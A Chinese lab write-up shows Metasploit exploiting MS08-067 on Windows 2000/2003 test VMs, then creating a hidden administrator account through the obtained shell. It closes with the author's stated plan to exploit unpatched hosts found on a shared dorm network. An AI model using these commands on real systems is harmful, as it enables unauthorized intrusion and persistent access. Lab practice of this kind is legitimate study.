這次實驗的主角是素有“內網殺手”之稱的metasploit。還是少說一些誇贊它的話(因為即使功能再強大,不明白它的原理,不會靈活使用它集成的功能,一樣沒有用),我們直入主題。簡單說一下這次實驗的目的:利用目標主機自身存在的內存溢出漏洞獲取目標主機的執行權限。
metasploit的強大不光在於漏洞利用方面,還有就是在信息收集方面。關於掃描,這里不多說,大家可以參考Matasploit掃描漏洞方法。
實驗環境:
windows2000(靶機)、windows2003(靶機)、4.3.0-kali1-amd64(滲透機)
首先,我們還是先查看一下1號靶機的信息。一看到windows2000,還有點小興奮,跟看到古董似的。
root@localhost:~# msfconsole進入metasploit終端界面,不得不說每次進入metasploit都會有不同的LOGO:
查看目標靶機是否可以ping通以及查看MS08-067漏洞是否適用於windows2000。
msf > ping 192.168.245.135
msf > info exploit/windows/smb/ms08_067_netapi
從上圖,我們可以看出MS08-067漏洞的可用目標包含windows2000
接着利用該漏洞並加載相應的模塊:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
msf exploit(ms08_067_netapi) > set rhost 192.168.245.135
msf exploit(ms08_067_netapi) > exploit
果然是“古董”,比紙還脆,一碰就破。
其實最開始我選擇的靶機並不是它,是自己之前學習時利用的一個操作系統——windows2003sp3。它沒有打任何的補丁,也沒有進行過任何的更新,可是它卻異常地頑強,我幾乎查閱了所有的資料,用了metasploit自帶的所有windows漏洞都沒能抓取到一個可用的session。后來,我返回去看它的鏡像文件。
2003_萬能?仔細回想,這個鏡像文件是2014年我在雨林木風下載的,補丁早已更新至當月最新,所以很多已有的漏洞都不能用了。而我又不是那種輕易放棄的人,我想到了最近才出來的“永恆之藍”漏洞,它也是利用445和339端口,所以打算更新metasploit及其數據庫。但是並不能行,而后我又上網查資料如何利用“永恆之藍”漏洞,發現必須去官方源下載wine。至此我終於放棄了,因為我太了解我們宿舍的網了(到現在我還木有實驗室,只能在寢室),而且這一個實驗已經拖了太久了,最后我還是選擇了更換靶機,總的來說還是有些遺憾。
我們接着看對windows2003的滲透:
這是靶機信息:
我們仍然利用MS08-067漏洞:
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set rhost 192.168.245.136
msf exploit(ms08_067_netapi) > exploit
靶機就是靶機。
實驗結束時,靶機也自動鎖屏了,而且登錄還要密碼,而我並不知道密碼。
索性就利用剛拿到的shell執行權限提權吧:
C:\WINDOWS\system32>net user admin admin /add //新建用戶admin 密碼也是admin
C:\WINDOWS\system32>net localgroup Administrators admin /add //將admin用戶添加到administrator組
C:\WINDOWS\system32>net user admin /active:yes
然后再登錄:
好了,現在可以為所欲為了(假裝這是得到的別人服務器)。
總結:
內存溢出漏洞的原理詳見內存溢出漏洞的原理與防治。metasploit功能強大,這次實驗只是看到了它的冰山一角,我相信外界對它的評價不是吹噓出來的。盡管它的很多功能我還沒接觸到,但我已經有了挖掘它的興趣。而且我肯定會完成對“永恆之藍”漏洞的 利用,因為對局域網的掃描讓我發現了很多主機的445和339仍然開啟,而且我不相信它們都已經被打補丁。